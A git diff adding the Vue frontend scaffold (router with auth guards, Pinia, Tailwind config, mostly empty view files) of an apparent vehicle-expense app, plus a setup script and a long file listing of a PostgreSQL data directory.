b/frontend/src/App.vue @@ -0,0 +1,99 @@ + + + + + \ No newline at end of file diff --git a/frontend/src/assets/vue.svg b/frontend/src/assets/vue.svg new file mode 100755 index 0000000..770e9d3 --- /dev/null +++ b/frontend/src/assets/vue.svg @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/frontend/src/components/HelloWorld.vue b/frontend/src/components/HelloWorld.vue new file mode 100755 index 0000000..546ebbc --- /dev/null +++ b/frontend/src/components/HelloWorld.vue @@ -0,0 +1,43 @@ + + + + + diff --git a/frontend/src/main.js b/frontend/src/main.js new file mode 100755 index 0000000..d191115 --- /dev/null +++ b/frontend/src/main.js @@ -0,0 +1,10 @@ +import { createApp } from 'vue' +import { createPinia } from 'pinia' +import router from './router' +import './style.css' +import App from './App.vue' + +const app = createApp(App) +app.use(createPinia()) +app.use(router) +app.mount('#app') \ No newline at end of file diff --git a/frontend/src/router/index.js b/frontend/src/router/index.js new file mode 100755 index 0000000..285064c --- /dev/null +++ b/frontend/src/router/index.js @@ -0,0 +1,57 @@ +import { createRouter, createWebHistory } from 'vue-router'; + +// Nézetek importálása +import Dashboard from '../views/Dashboard.vue'; +import Expenses from '../views/Expenses.vue'; +import AddExpense from '../views/AddExpense.vue'; +import Login from '../views/Login.vue'; +import Register from '../views/Register.vue'; +import ForgotPassword from '../views/ForgotPassword.vue'; +import ResetPassword from '../views/ResetPassword.vue'; +import AddVehicle from '../views/AddVehicle.vue'; +import AdminStats from '../views/admin/AdminStats.vue'; + +const routes = [ + // Védett útvonalak + { path: '/', name: 'Dashboard', component: Dashboard, meta: { requiresAuth: true } }, + { path: '/expenses', name: 'Expenses', component: Expenses, meta: { requiresAuth: true } }, + { path: '/expenses/add', name: 'AddExpense', component: AddExpense, meta: { requiresAuth: true } }, + { path: '/vehicles/add', name: 'AddVehicle', component: AddVehicle, meta: { requiresAuth: true } }, + + // ADMIN útvonal + { + path: '/admin', + name: 'Admin', + component: AdminStats, + meta: { requiresAuth: true, requiresAdmin: true } + }, + + // Nyilvános útvonalak + { path: '/login', name: 'Login', component: Login }, + { path: '/register', name: 'Register', component: Register }, + { path: '/forgot-password', name: 'ForgotPassword', component: ForgotPassword }, + { path: '/reset-password', name: 'ResetPassword', component: ResetPassword }, +]; + +const router = createRouter({ + history: createWebHistory(), + routes +}); + +// A "SOROMPÓ" (Auth Guard) LOGIKA +router.beforeEach((to, from, next) => { + const token = localStorage.getItem('token'); + // Egyszerűsített admin check (később a JWT-ből decodoljuk) + const isAdmin = localStorage.getItem('is_admin') === 'true'; + + if (to.meta.requiresAuth && !token) { + next('/login'); + } else if (to.meta.requiresAdmin && !isAdmin) { + // Ha admin oldalra menne, de nem admin, dobja a főoldalra + next('/'); + } else { + next(); + } +}); + +export default router; \ No newline at end of file diff --git a/frontend/src/style.css b/frontend/src/style.css new file mode 100755 index 0000000..4b81c29 --- /dev/null +++ b/frontend/src/style.css @@ -0,0 +1,8 @@ +@import "tailwindcss"; + +/* Tiszta CSS-t használunk a body-hoz a hiba elkerülése végett */ +body { + background-color: #f9fafb; /* gray-50 */ + margin: 0; + font-family: sans-serif; +} \ No newline at end of file diff --git a/frontend/src/views/AddExpense.vue b/frontend/src/views/AddExpense.vue new file mode 100755 index 0000000..b59b302 --- /dev/null +++ b/frontend/src/views/AddExpense.vue @@ -0,0 +1,56 @@ + + + \ No newline at end of file diff --git a/frontend/src/views/AddVehicle.vue b/frontend/src/views/AddVehicle.vue new file mode 100755 index 0000000..62e0ca3 --- /dev/null +++ b/frontend/src/views/AddVehicle.vue @@ -0,0 +1,68 @@ + + + \ No newline at end of file diff --git a/frontend/src/views/Dashboard.vue b/frontend/src/views/Dashboard.vue new file mode 100755 index 0000000..680c4e2 --- /dev/null +++ b/frontend/src/views/Dashboard.vue @@ -0,0 +1,33 @@ + + + \ No newline at end of file diff --git a/frontend/src/views/Expenses.vue b/frontend/src/views/Expenses.vue new file mode 100755 index 0000000..87e941d --- /dev/null +++ b/frontend/src/views/Expenses.vue @@ -0,0 +1,8 @@ + \ No newline at end of file diff --git a/frontend/src/views/ForgotPassword.vue b/frontend/src/views/ForgotPassword.vue new file mode 100755 index 0000000..db77b17 --- /dev/null +++ b/frontend/src/views/ForgotPassword.vue @@ -0,0 +1,33 @@ + + + \ No newline at end of file diff --git a/frontend/src/views/Login.vue b/frontend/src/views/Login.vue new file mode 100755 index 0000000..2f52e83 --- /dev/null +++ b/frontend/src/views/Login.vue @@ -0,0 +1,87 @@ + + + \ No newline at end of file diff --git a/frontend/src/views/Register.vue b/frontend/src/views/Register.vue new file mode 100755 index 0000000..8ed701a --- /dev/null +++ b/frontend/src/views/Register.vue @@ -0,0 +1,36 @@ + + + \ No newline at end of file diff --git a/frontend/src/views/ResetPassword.vue b/frontend/src/views/ResetPassword.vue new file mode 100755 index 0000000..4fabfe8 --- /dev/null +++ b/frontend/src/views/ResetPassword.vue @@ -0,0 +1,43 @@ + + + \ No newline at end of file diff --git a/frontend/src/views/admin/AdminStats.vue b/frontend/src/views/admin/AdminStats.vue new file mode 100755 index 0000000..84b8d0b --- /dev/null +++ b/frontend/src/views/admin/AdminStats.vue @@ -0,0 +1,48 @@ + \ No newline at end of file diff --git a/frontend/tailwind.config.js b/frontend/tailwind.config.js new file mode 100755 index 0000000..ff48818 --- /dev/null +++ b/frontend/tailwind.config.js @@ -0,0 +1,11 @@ +/** @type {import('tailwindcss').Config} */ +export default { + content: [ + "./index.html", + "./src/**/*.{vue,js,ts,jsx,tsx}", + ], + theme: { + extend: {}, + }, + plugins: [], +} \ No newline at end of file diff --git a/frontend/vite.config.js b/frontend/vite.config.js new file mode 100755 index 0000000..bbcf80c --- /dev/null +++ b/frontend/vite.config.js @@ -0,0 +1,7 @@ +import { defineConfig } from 'vite' +import vue from '@vitejs/plugin-vue' + +// https://vite.dev/config/ +export default defineConfig({ + plugins: [vue()], +}) diff --git a/init_dev.sh b/init_dev.sh new file mode 100755 index 0000000..00ec9b7 --- /dev/null +++ b/init_dev.sh @@ -0,0 +1,3 @@ +#!/bin/bash +sudo apt-get update && sudo apt-get install -y mc python3 python3-pip docker.io htop +echo "--- Fejlesztői környezet kész! ---" \ No newline at end of file diff --git a/lista.txt b/lista.txt new file mode 100755 index 0000000..1c442b2 --- /dev/null +++ b/lista.txt @@ -0,0 +1,10749 @@ +/opt/service_finder +/opt/service_finder/docker-compose.yml +/opt/service_finder/.env +/opt/service_finder/postgres +/opt/service_finder/postgres/init-db.sql +/opt/service_finder/postgres/data +/opt/service_finder/postgres/data/pg_commit_ts +/opt/service_finder/postgres/data/pg_logical +/opt/service_finder/postgres/data/pg_logical/snapshots +/opt/service_finder/postgres/data/pg_logical/mappings +/opt/service_finder/postgres/data/pg_logical/replorigin_checkpoint +/opt/service_finder/postgres/data/base +/opt/service_finder/postgres/data/base/16384 +/opt/service_finder/postgres/data/base/16384/3079_fsm +/opt/service_finder/postgres/data/base/16384/4143 +/opt/service_finder/postgres/data/base/16384/3455 +/opt/service_finder/postgres/data/base/16384/16408 +/opt/service_finder/postgres/data/base/16384/2686 +/opt/service_finder/postgres/data/base/16384/pg_filenode.map +/opt/service_finder/postgres/data/base/16384/3602_vm +/opt/service_finder/postgres/data/base/16384/1255_vm +/opt/service_finder/postgres/data/base/16384/16441 +/opt/service_finder/postgres/data/base/16384/2601_vm +/opt/service_finder/postgres/data/base/16384/2838_vm +/opt/service_finder/postgres/data/base/16384/18438 +/opt/service_finder/postgres/data/base/16384/13478_vm +/opt/service_finder/postgres/data/base/16384/2836_fsm +/opt/service_finder/postgres/data/base/16384/3164 +/opt/service_finder/postgres/data/base/16384/13477 +/opt/service_finder/postgres/data/base/16384/18505 +/opt/service_finder/postgres/data/base/16384/18534 +/opt/service_finder/postgres/data/base/16384/3351 +/opt/service_finder/postgres/data/base/16384/3600_vm +/opt/service_finder/postgres/data/base/16384/5002 +/opt/service_finder/postgres/data/base/16384/1255_fsm +/opt/service_finder/postgres/data/base/16384/3380 +/opt/service_finder/postgres/data/base/16384/3381 +/opt/service_finder/postgres/data/base/16384/2663 +/opt/service_finder/postgres/data/base/16384/3601_fsm +/opt/service_finder/postgres/data/base/16384/18532 +/opt/service_finder/postgres/data/base/16384/4148 +/opt/service_finder/postgres/data/base/16384/2618_fsm +/opt/service_finder/postgres/data/base/16384/3440 +/opt/service_finder/postgres/data/base/16384/2619_vm +/opt/service_finder/postgres/data/base/16384/16482 +/opt/service_finder/postgres/data/base/16384/3467 +/opt/service_finder/postgres/data/base/16384/2688 +/opt/service_finder/postgres/data/base/16384/18531 +/opt/service_finder/postgres/data/base/16384/3997 +/opt/service_finder/postgres/data/base/16384/2662 +/opt/service_finder/postgres/data/base/16384/6229 +/opt/service_finder/postgres/data/base/16384/3439 +/opt/service_finder/postgres/data/base/16384/2657 +/opt/service_finder/postgres/data/base/16384/2609_vm +/opt/service_finder/postgres/data/base/16384/18524 +/opt/service_finder/postgres/data/base/16384/18403 +/opt/service_finder/postgres/data/base/16384/4157 +/opt/service_finder/postgres/data/base/16384/3257 +/opt/service_finder/postgres/data/base/16384/3503 +/opt/service_finder/postgres/data/base/16384/16525 +/opt/service_finder/postgres/data/base/16384/13463 +/opt/service_finder/postgres/data/base/16384/3541_fsm +/opt/service_finder/postgres/data/base/16384/2756 +/opt/service_finder/postgres/data/base/16384/2615_vm +/opt/service_finder/postgres/data/base/16384/1259_vm +/opt/service_finder/postgres/data/base/16384/3256 +/opt/service_finder/postgres/data/base/16384/2615_fsm +/opt/service_finder/postgres/data/base/16384/18414 +/opt/service_finder/postgres/data/base/16384/2703 +/opt/service_finder/postgres/data/base/16384/2753_vm +/opt/service_finder/postgres/data/base/16384/2603_vm +/opt/service_finder/postgres/data/base/16384/1249_fsm +/opt/service_finder/postgres/data/base/16384/2620_fsm +/opt/service_finder/postgres/data/base/16384/3600 +/opt/service_finder/postgres/data/base/16384/2653 +/opt/service_finder/postgres/data/base/16384/2337 +/opt/service_finder/postgres/data/base/16384/13473_fsm +/opt/service_finder/postgres/data/base/16384/3085 +/opt/service_finder/postgres/data/base/16384/2995 +/opt/service_finder/postgres/data/base/16384/2336 +/opt/service_finder/postgres/data/base/16384/2612_fsm +/opt/service_finder/postgres/data/base/16384/3258 +/opt/service_finder/postgres/data/base/16384/3466 +/opt/service_finder/postgres/data/base/16384/3079 +/opt/service_finder/postgres/data/base/16384/4144 +/opt/service_finder/postgres/data/base/16384/1417 +/opt/service_finder/postgres/data/base/16384/13472 +/opt/service_finder/postgres/data/base/16384/18421 +/opt/service_finder/postgres/data/base/16384/2666 +/opt/service_finder/postgres/data/base/16384/13467 +/opt/service_finder/postgres/data/base/16384/6228 +/opt/service_finder/postgres/data/base/16384/6117 +/opt/service_finder/postgres/data/base/16384/2757 +/opt/service_finder/postgres/data/base/16384/2685 +/opt/service_finder/postgres/data/base/16384/2612_vm +/opt/service_finder/postgres/data/base/16384/2615 +/opt/service_finder/postgres/data/base/16384/3501 +/opt/service_finder/postgres/data/base/16384/3602 +/opt/service_finder/postgres/data/base/16384/6176 +/opt/service_finder/postgres/data/base/16384/16412 +/opt/service_finder/postgres/data/base/16384/2605 +/opt/service_finder/postgres/data/base/16384/2674 +/opt/service_finder/postgres/data/base/16384/2754 +/opt/service_finder/postgres/data/base/16384/13463_vm +/opt/service_finder/postgres/data/base/16384/549 +/opt/service_finder/postgres/data/base/16384/3712 +/opt/service_finder/postgres/data/base/16384/2669 +/opt/service_finder/postgres/data/base/16384/18404 +/opt/service_finder/postgres/data/base/16384/16463 +/opt/service_finder/postgres/data/base/16384/2689 +/opt/service_finder/postgres/data/base/16384/4152 +/opt/service_finder/postgres/data/base/16384/3395 +/opt/service_finder/postgres/data/base/16384/2693 +/opt/service_finder/postgres/data/base/16384/16470 +/opt/service_finder/postgres/data/base/16384/4149 +/opt/service_finder/postgres/data/base/16384/18477 +/opt/service_finder/postgres/data/base/16384/16449 +/opt/service_finder/postgres/data/base/16384/548 +/opt/service_finder/postgres/data/base/16384/2699 +/opt/service_finder/postgres/data/base/16384/2673 +/opt/service_finder/postgres/data/base/16384/3431 +/opt/service_finder/postgres/data/base/16384/3574 +/opt/service_finder/postgres/data/base/16384/3468 +/opt/service_finder/postgres/data/base/16384/4171 +/opt/service_finder/postgres/data/base/16384/16469 +/opt/service_finder/postgres/data/base/16384/4163 +/opt/service_finder/postgres/data/base/16384/2696 +/opt/service_finder/postgres/data/base/16384/4168 +/opt/service_finder/postgres/data/base/16384/6102 +/opt/service_finder/postgres/data/base/16384/3597 +/opt/service_finder/postgres/data/base/16384/18514 +/opt/service_finder/postgres/data/base/16384/pg_internal.init +/opt/service_finder/postgres/data/base/16384/PG_VERSION +/opt/service_finder/postgres/data/base/16384/2837 +/opt/service_finder/postgres/data/base/16384/16414 +/opt/service_finder/postgres/data/base/16384/2579 +/opt/service_finder/postgres/data/base/16384/2604_fsm +/opt/service_finder/postgres/data/base/16384/827 +/opt/service_finder/postgres/data/base/16384/4158 +/opt/service_finder/postgres/data/base/16384/18512 +/opt/service_finder/postgres/data/base/16384/2691 +/opt/service_finder/postgres/data/base/16384/826 +/opt/service_finder/postgres/data/base/16384/2660 +/opt/service_finder/postgres/data/base/16384/3596 +/opt/service_finder/postgres/data/base/16384/18504 +/opt/service_finder/postgres/data/base/16384/16476 +/opt/service_finder/postgres/data/base/16384/2228 +/opt/service_finder/postgres/data/base/16384/3605 +/opt/service_finder/postgres/data/base/16384/2668 +/opt/service_finder/postgres/data/base/16384/4145 +/opt/service_finder/postgres/data/base/16384/13481 +/opt/service_finder/postgres/data/base/16384/18484 +/opt/service_finder/postgres/data/base/16384/2602_vm +/opt/service_finder/postgres/data/base/16384/2602_fsm +/opt/service_finder/postgres/data/base/16384/3079_vm +/opt/service_finder/postgres/data/base/16384/4155 +/opt/service_finder/postgres/data/base/16384/13476 +/opt/service_finder/postgres/data/base/16384/2617_fsm +/opt/service_finder/postgres/data/base/16384/2607_vm +/opt/service_finder/postgres/data/base/16384/2606 +/opt/service_finder/postgres/data/base/16384/2610_fsm +/opt/service_finder/postgres/data/base/16384/2831 +/opt/service_finder/postgres/data/base/16384/16471 +/opt/service_finder/postgres/data/base/16384/3394_vm +/opt/service_finder/postgres/data/base/16384/4147 +/opt/service_finder/postgres/data/base/16384/1255 +/opt/service_finder/postgres/data/base/16384/2607 +/opt/service_finder/postgres/data/base/16384/2611 +/opt/service_finder/postgres/data/base/16384/18537 +/opt/service_finder/postgres/data/base/16384/2753_fsm +/opt/service_finder/postgres/data/base/16384/2187 +/opt/service_finder/postgres/data/base/16384/2650 +/opt/service_finder/postgres/data/base/16384/18411 +/opt/service_finder/postgres/data/base/16384/3601_vm +/opt/service_finder/postgres/data/base/16384/2658 +/opt/service_finder/postgres/data/base/16384/2606_vm +/opt/service_finder/postgres/data/base/16384/18486 +/opt/service_finder/postgres/data/base/16384/13482 +/opt/service_finder/postgres/data/base/16384/2602 +/opt/service_finder/postgres/data/base/16384/2609_fsm +/opt/service_finder/postgres/data/base/16384/3607 +/opt/service_finder/postgres/data/base/16384/3764_fsm +/opt/service_finder/postgres/data/base/16384/4165 +/opt/service_finder/postgres/data/base/16384/3764_vm +/opt/service_finder/postgres/data/base/16384/18463 +/opt/service_finder/postgres/data/base/16384/4167 +/opt/service_finder/postgres/data/base/16384/16439 +/opt/service_finder/postgres/data/base/16384/2600_vm +/opt/service_finder/postgres/data/base/16384/3350 +/opt/service_finder/postgres/data/base/16384/2652 +/opt/service_finder/postgres/data/base/16384/3118 +/opt/service_finder/postgres/data/base/16384/3603_vm +/opt/service_finder/postgres/data/base/16384/2704 +/opt/service_finder/postgres/data/base/16384/2328 +/opt/service_finder/postgres/data/base/16384/6237 +/opt/service_finder/postgres/data/base/16384/4150 +/opt/service_finder/postgres/data/base/16384/3606 +/opt/service_finder/postgres/data/base/16384/1259_fsm +/opt/service_finder/postgres/data/base/16384/2675 +/opt/service_finder/postgres/data/base/16384/3598 +/opt/service_finder/postgres/data/base/16384/6110 +/opt/service_finder/postgres/data/base/16384/18428 +/opt/service_finder/postgres/data/base/16384/113 +/opt/service_finder/postgres/data/base/16384/1247_fsm +/opt/service_finder/postgres/data/base/16384/18525 +/opt/service_finder/postgres/data/base/16384/2682 +/opt/service_finder/postgres/data/base/16384/16455 +/opt/service_finder/postgres/data/base/16384/13471 +/opt/service_finder/postgres/data/base/16384/13473 +/opt/service_finder/postgres/data/base/16384/18536 +/opt/service_finder/postgres/data/base/16384/3608 +/opt/service_finder/postgres/data/base/16384/4173 +/opt/service_finder/postgres/data/base/16384/2679 +/opt/service_finder/postgres/data/base/16384/3379 +/opt/service_finder/postgres/data/base/16384/2616 +/opt/service_finder/postgres/data/base/16384/18456 +/opt/service_finder/postgres/data/base/16384/16475 +/opt/service_finder/postgres/data/base/16384/2839 +/opt/service_finder/postgres/data/base/16384/18413 +/opt/service_finder/postgres/data/base/16384/3764 +/opt/service_finder/postgres/data/base/16384/2661 +/opt/service_finder/postgres/data/base/16384/2835 +/opt/service_finder/postgres/data/base/16384/2619 +/opt/service_finder/postgres/data/base/16384/2608_fsm +/opt/service_finder/postgres/data/base/16384/2655 +/opt/service_finder/postgres/data/base/16384/3766 +/opt/service_finder/postgres/data/base/16384/3394 +/opt/service_finder/postgres/data/base/16384/16453 +/opt/service_finder/postgres/data/base/16384/3080 +/opt/service_finder/postgres/data/base/16384/2619_fsm +/opt/service_finder/postgres/data/base/16384/3541_vm +/opt/service_finder/postgres/data/base/16384/4164 +/opt/service_finder/postgres/data/base/16384/3502 +/opt/service_finder/postgres/data/base/16384/4159 +/opt/service_finder/postgres/data/base/16384/2613 +/opt/service_finder/postgres/data/base/16384/4153 +/opt/service_finder/postgres/data/base/16384/18513 +/opt/service_finder/postgres/data/base/16384/6112 +/opt/service_finder/postgres/data/base/16384/3456_vm +/opt/service_finder/postgres/data/base/16384/2616_fsm +/opt/service_finder/postgres/data/base/16384/16519 +/opt/service_finder/postgres/data/base/16384/2224 +/opt/service_finder/postgres/data/base/16384/2603 +/opt/service_finder/postgres/data/base/16384/18455 +/opt/service_finder/postgres/data/base/16384/2665 +/opt/service_finder/postgres/data/base/16384/16518 +/opt/service_finder/postgres/data/base/16384/2755 +/opt/service_finder/postgres/data/base/16384/3604 +/opt/service_finder/postgres/data/base/16384/2609 +/opt/service_finder/postgres/data/base/16384/2659 +/opt/service_finder/postgres/data/base/16384/2612 +/opt/service_finder/postgres/data/base/16384/13466 +/opt/service_finder/postgres/data/base/16384/2690 +/opt/service_finder/postgres/data/base/16384/2838 +/opt/service_finder/postgres/data/base/16384/1249 +/opt/service_finder/postgres/data/base/16384/3429 +/opt/service_finder/postgres/data/base/16384/16473 +/opt/service_finder/postgres/data/base/16384/828 +/opt/service_finder/postgres/data/base/16384/2620_vm +/opt/service_finder/postgres/data/base/16384/3599 +/opt/service_finder/postgres/data/base/16384/2680 +/opt/service_finder/postgres/data/base/16384/18464 +/opt/service_finder/postgres/data/base/16384/18494 +/opt/service_finder/postgres/data/base/16384/3534 +/opt/service_finder/postgres/data/base/16384/2836_vm +/opt/service_finder/postgres/data/base/16384/2618 +/opt/service_finder/postgres/data/base/16384/2840_vm +/opt/service_finder/postgres/data/base/16384/2654 +/opt/service_finder/postgres/data/base/16384/4166 +/opt/service_finder/postgres/data/base/16384/2600_fsm +/opt/service_finder/postgres/data/base/16384/18429 +/opt/service_finder/postgres/data/base/16384/2841 +/opt/service_finder/postgres/data/base/16384/18419 +/opt/service_finder/postgres/data/base/16384/2617_vm +/opt/service_finder/postgres/data/base/16384/2996 +/opt/service_finder/postgres/data/base/16384/3433 +/opt/service_finder/postgres/data/base/16384/2684 +/opt/service_finder/postgres/data/base/16384/3603_fsm +/opt/service_finder/postgres/data/base/16384/1247_vm +/opt/service_finder/postgres/data/base/16384/3394_fsm +/opt/service_finder/postgres/data/base/16384/6175 +/opt/service_finder/postgres/data/base/16384/2834 +/opt/service_finder/postgres/data/base/16384/3609 +/opt/service_finder/postgres/data/base/16384/2692 +/opt/service_finder/postgres/data/base/16384/3600_fsm +/opt/service_finder/postgres/data/base/16384/2701 +/opt/service_finder/postgres/data/base/16384/4160 +/opt/service_finder/postgres/data/base/16384/4146 +/opt/service_finder/postgres/data/base/16384/1418 +/opt/service_finder/postgres/data/base/16384/6116 +/opt/service_finder/postgres/data/base/16384/6104 +/opt/service_finder/postgres/data/base/16384/1247 +/opt/service_finder/postgres/data/base/16384/2651 +/opt/service_finder/postgres/data/base/16384/3456_fsm +/opt/service_finder/postgres/data/base/16384/18542 +/opt/service_finder/postgres/data/base/16384/2616_vm +/opt/service_finder/postgres/data/base/16384/16435 +/opt/service_finder/postgres/data/base/16384/4156 +/opt/service_finder/postgres/data/base/16384/4169 +/opt/service_finder/postgres/data/base/16384/2833 +/opt/service_finder/postgres/data/base/16384/2836 +/opt/service_finder/postgres/data/base/16384/4151 +/opt/service_finder/postgres/data/base/16384/174 +/opt/service_finder/postgres/data/base/16384/18409 +/opt/service_finder/postgres/data/base/16384/6111 +/opt/service_finder/postgres/data/base/16384/3602_fsm +/opt/service_finder/postgres/data/base/16384/13463_fsm +/opt/service_finder/postgres/data/base/16384/2618_vm +/opt/service_finder/postgres/data/base/16384/13478 +/opt/service_finder/postgres/data/base/16384/18530 +/opt/service_finder/postgres/data/base/16384/2678 +/opt/service_finder/postgres/data/base/16384/2683 +/opt/service_finder/postgres/data/base/16384/2656 +/opt/service_finder/postgres/data/base/16384/2667 +/opt/service_finder/postgres/data/base/16384/3119 +/opt/service_finder/postgres/data/base/16384/18462 +/opt/service_finder/postgres/data/base/16384/16484 +/opt/service_finder/postgres/data/base/16384/2600 +/opt/service_finder/postgres/data/base/16384/2620 +/opt/service_finder/postgres/data/base/16384/2753 +/opt/service_finder/postgres/data/base/16384/112 +/opt/service_finder/postgres/data/base/16384/18502 +/opt/service_finder/postgres/data/base/16384/2608_vm +/opt/service_finder/postgres/data/base/16384/3575 +/opt/service_finder/postgres/data/base/16384/3767 +/opt/service_finder/postgres/data/base/16384/6113 +/opt/service_finder/postgres/data/base/16384/16448 +/opt/service_finder/postgres/data/base/16384/16462 +/opt/service_finder/postgres/data/base/16384/13473_vm +/opt/service_finder/postgres/data/base/16384/3542 +/opt/service_finder/postgres/data/base/16384/1259 +/opt/service_finder/postgres/data/base/16384/2604 +/opt/service_finder/postgres/data/base/16384/2840 +/opt/service_finder/postgres/data/base/16384/3601 +/opt/service_finder/postgres/data/base/16384/2605_vm +/opt/service_finder/postgres/data/base/16384/16407 +/opt/service_finder/postgres/data/base/16384/2606_fsm +/opt/service_finder/postgres/data/base/16384/2830 +/opt/service_finder/postgres/data/base/16384/13468 +/opt/service_finder/postgres/data/base/16384/6239 +/opt/service_finder/postgres/data/base/16384/3430 +/opt/service_finder/postgres/data/base/16384/2607_fsm +/opt/service_finder/postgres/data/base/16384/18493 +/opt/service_finder/postgres/data/base/16384/2617 +/opt/service_finder/postgres/data/base/16384/2702 +/opt/service_finder/postgres/data/base/16384/13478_fsm +/opt/service_finder/postgres/data/base/16384/4174 +/opt/service_finder/postgres/data/base/16384/6106 +/opt/service_finder/postgres/data/base/16384/2681 +/opt/service_finder/postgres/data/base/16384/6238 +/opt/service_finder/postgres/data/base/16384/2610_vm +/opt/service_finder/postgres/data/base/16384/2838_fsm +/opt/service_finder/postgres/data/base/16384/4172 +/opt/service_finder/postgres/data/base/16384/175 +/opt/service_finder/postgres/data/base/16384/18476 +/opt/service_finder/postgres/data/base/16384/3541 +/opt/service_finder/postgres/data/base/16384/2832 +/opt/service_finder/postgres/data/base/16384/2601_fsm +/opt/service_finder/postgres/data/base/16384/4170 +/opt/service_finder/postgres/data/base/16384/3603 +/opt/service_finder/postgres/data/base/16384/2610 +/opt/service_finder/postgres/data/base/16384/2670 +/opt/service_finder/postgres/data/base/16384/1249_vm +/opt/service_finder/postgres/data/base/16384/2601 +/opt/service_finder/postgres/data/base/16384/2605_fsm +/opt/service_finder/postgres/data/base/16384/3081 +/opt/service_finder/postgres/data/base/16384/4154 +/opt/service_finder/postgres/data/base/16384/16440 +/opt/service_finder/postgres/data/base/16384/3456 +/opt/service_finder/postgres/data/base/16384/13468_vm +/opt/service_finder/postgres/data/base/16384/13468_fsm +/opt/service_finder/postgres/data/base/16384/2603_fsm +/opt/service_finder/postgres/data/base/16384/2687 +/opt/service_finder/postgres/data/base/16384/2608 +/opt/service_finder/postgres/data/base/16384/2664 +/opt/service_finder/postgres/data/base/16384/2840_fsm +/opt/service_finder/postgres/data/base/16384/3576 +/opt/service_finder/postgres/data/base/5 +/opt/service_finder/postgres/data/base/5/3079_fsm +/opt/service_finder/postgres/data/base/5/4143 +/opt/service_finder/postgres/data/base/5/3455 +/opt/service_finder/postgres/data/base/5/2686 +/opt/service_finder/postgres/data/base/5/pg_filenode.map +/opt/service_finder/postgres/data/base/5/3602_vm +/opt/service_finder/postgres/data/base/5/1255_vm +/opt/service_finder/postgres/data/base/5/2601_vm +/opt/service_finder/postgres/data/base/5/2838_vm +/opt/service_finder/postgres/data/base/5/13478_vm +/opt/service_finder/postgres/data/base/5/2836_fsm +/opt/service_finder/postgres/data/base/5/3164 +/opt/service_finder/postgres/data/base/5/13477 +/opt/service_finder/postgres/data/base/5/3351 +/opt/service_finder/postgres/data/base/5/3600_vm +/opt/service_finder/postgres/data/base/5/5002 +/opt/service_finder/postgres/data/base/5/1255_fsm +/opt/service_finder/postgres/data/base/5/3380 +/opt/service_finder/postgres/data/base/5/3381 +/opt/service_finder/postgres/data/base/5/2663 +/opt/service_finder/postgres/data/base/5/3601_fsm +/opt/service_finder/postgres/data/base/5/4148 +/opt/service_finder/postgres/data/base/5/2618_fsm +/opt/service_finder/postgres/data/base/5/3440 +/opt/service_finder/postgres/data/base/5/2619_vm +/opt/service_finder/postgres/data/base/5/3467 +/opt/service_finder/postgres/data/base/5/2688 +/opt/service_finder/postgres/data/base/5/3997 +/opt/service_finder/postgres/data/base/5/2662 +/opt/service_finder/postgres/data/base/5/6229 +/opt/service_finder/postgres/data/base/5/3439 +/opt/service_finder/postgres/data/base/5/2657 +/opt/service_finder/postgres/data/base/5/2609_vm +/opt/service_finder/postgres/data/base/5/4157 +/opt/service_finder/postgres/data/base/5/3257 +/opt/service_finder/postgres/data/base/5/3503 +/opt/service_finder/postgres/data/base/5/13463 +/opt/service_finder/postgres/data/base/5/3541_fsm +/opt/service_finder/postgres/data/base/5/2756 +/opt/service_finder/postgres/data/base/5/2615_vm +/opt/service_finder/postgres/data/base/5/1259_vm +/opt/service_finder/postgres/data/base/5/3256 +/opt/service_finder/postgres/data/base/5/2615_fsm +/opt/service_finder/postgres/data/base/5/2703 +/opt/service_finder/postgres/data/base/5/2753_vm +/opt/service_finder/postgres/data/base/5/2603_vm +/opt/service_finder/postgres/data/base/5/1249_fsm +/opt/service_finder/postgres/data/base/5/3600 +/opt/service_finder/postgres/data/base/5/2653 +/opt/service_finder/postgres/data/base/5/2337 +/opt/service_finder/postgres/data/base/5/13473_fsm +/opt/service_finder/postgres/data/base/5/3085 +/opt/service_finder/postgres/data/base/5/2995 +/opt/service_finder/postgres/data/base/5/2336 +/opt/service_finder/postgres/data/base/5/2612_fsm +/opt/service_finder/postgres/data/base/5/3258 +/opt/service_finder/postgres/data/base/5/3466 +/opt/service_finder/postgres/data/base/5/3079 +/opt/service_finder/postgres/data/base/5/4144 +/opt/service_finder/postgres/data/base/5/1417 +/opt/service_finder/postgres/data/base/5/13472 +/opt/service_finder/postgres/data/base/5/2666 +/opt/service_finder/postgres/data/base/5/13467 +/opt/service_finder/postgres/data/base/5/6228 +/opt/service_finder/postgres/data/base/5/6117 +/opt/service_finder/postgres/data/base/5/2757 +/opt/service_finder/postgres/data/base/5/2685 +/opt/service_finder/postgres/data/base/5/2612_vm +/opt/service_finder/postgres/data/base/5/2615 +/opt/service_finder/postgres/data/base/5/3501 +/opt/service_finder/postgres/data/base/5/3602 +/opt/service_finder/postgres/data/base/5/6176 +/opt/service_finder/postgres/data/base/5/2605 +/opt/service_finder/postgres/data/base/5/2674 +/opt/service_finder/postgres/data/base/5/2754 +/opt/service_finder/postgres/data/base/5/13463_vm +/opt/service_finder/postgres/data/base/5/549 +/opt/service_finder/postgres/data/base/5/3712 +/opt/service_finder/postgres/data/base/5/2669 +/opt/service_finder/postgres/data/base/5/2689 +/opt/service_finder/postgres/data/base/5/4152 +/opt/service_finder/postgres/data/base/5/3395 +/opt/service_finder/postgres/data/base/5/2693 +/opt/service_finder/postgres/data/base/5/4149 +/opt/service_finder/postgres/data/base/5/548 +/opt/service_finder/postgres/data/base/5/2699 +/opt/service_finder/postgres/data/base/5/2673 +/opt/service_finder/postgres/data/base/5/3431 +/opt/service_finder/postgres/data/base/5/3574 +/opt/service_finder/postgres/data/base/5/3468 +/opt/service_finder/postgres/data/base/5/4171 +/opt/service_finder/postgres/data/base/5/4163 +/opt/service_finder/postgres/data/base/5/2696 +/opt/service_finder/postgres/data/base/5/4168 +/opt/service_finder/postgres/data/base/5/6102 +/opt/service_finder/postgres/data/base/5/3597 +/opt/service_finder/postgres/data/base/5/PG_VERSION +/opt/service_finder/postgres/data/base/5/2837 +/opt/service_finder/postgres/data/base/5/2579 +/opt/service_finder/postgres/data/base/5/827 +/opt/service_finder/postgres/data/base/5/4158 +/opt/service_finder/postgres/data/base/5/2691 +/opt/service_finder/postgres/data/base/5/826 +/opt/service_finder/postgres/data/base/5/2660 +/opt/service_finder/postgres/data/base/5/3596 +/opt/service_finder/postgres/data/base/5/2228 +/opt/service_finder/postgres/data/base/5/3605 +/opt/service_finder/postgres/data/base/5/2668 +/opt/service_finder/postgres/data/base/5/4145 +/opt/service_finder/postgres/data/base/5/13481 